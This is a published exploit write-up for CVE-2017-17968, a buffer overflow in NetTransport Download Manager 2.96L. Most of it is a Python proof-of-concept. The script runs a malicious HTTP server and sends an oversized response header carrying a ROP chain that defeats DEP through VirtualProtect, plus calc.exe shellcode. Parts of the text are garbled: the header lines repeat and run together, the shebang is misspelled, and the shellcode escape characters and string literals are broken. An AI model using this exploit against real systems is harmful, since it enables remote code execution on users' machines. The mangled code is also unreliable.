# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
# Software Link: http://xi-soft.com/downloads/NXS # Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip <http://xi-soft.com/downloads/NXSetup_x86.zip>
# Exploit Author: Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr>
# Vendor Homepage: http://xi-soft.com/default.htm <http://xi-soft.com/default.htm>
# Category: webapps
# Impact: Code execution
1. Description
A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
2. Proof of Concept
#!/usr/bin/pythion
def main():
host = "192.168.205.131"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "
[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
#Disabling DEP by VirtualProtect()
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x10001653, # POP EAX # RETN [libssl.dll]
0x00485ed3,# MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00496596, # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x004ea919, # POP EBP # RETN [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x4141, # Filler (RETN offset compensation)
0x004608df, # & push esp # ret [NetTransport.exe]
0x0045e75f, # POP EBX # RETN [NetTransport.exe]
0x00000201, # 0x00000201-> ebx
0x00554dbc, # POP ECX # RETN [NetTransport.exe]
0x00000040, # 0x00000040-> edx
0x00499c92, # XOR EDX,EDX # RETN 0x04 [NetTransport.exe]
0x0041254c, # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x0054e559, # POP ECX # RETN [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x10004b93, # &Writable location [libssl.dll]
0x0050343f, # POP EDI # RETN [NetTransport.exe]
0x00487073, # RETN (ROP NOP) [NetTransport.exe]
0x10001653, # POP EAX # RETN [libssl.dll]
0x90909090, # nop
0x00486f78, # PUSHAD # RETN [NetTransport.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#Tiny calc.exe shellcode
shellcode = (
"xd9xcbxbexb9x23x67x31xd9x74x24xf4x5ax29xc9" +
"xb1x13x31x72x19x83xc2x04x03x72x15x5bxd6x56" +
"xe3xc9x71xfax62x81xe2x75x82x0bxb3xe1xc0xd9" +
"x0bx61xa0x11xe7x03x41x84x7cxdbxd2xa8x9ax97" +
"xbax68x10xfbx5bxe8xadx70x7bx28xb3x86x08x64" +
"xacx52x0ex8dxddx2dx3cx3cxa0xfcxbcx82x23xa8" +
"xd7x94x6ex23xd9xe3x05xd4x05xf2x1bxe9x09x5a" +
"x1cx39xbd"
)
MaxSize = 60000
EAX_overwrite= "A"*16739 #Always trigger a crash at EAX
#EIP 004E7828
#evil = "x28x78x4Ex90"
rop = rop_chain
nops = "x90"*10
pads = "C"*(MaxSize - len(EAX_overwrite + rop + nops + shellcode))
payload = EAX_overwrite + rop + nops + shellcode + pads
buffer = "HTTP/1.1 200 " + payload + "
"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK
"
cl.close()
s.close()
if __name__ == '__main__':
import struct
import socket
main()
3. Solution:
No solution available at the moment.
NetTransport Download Manager 2.96L Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 331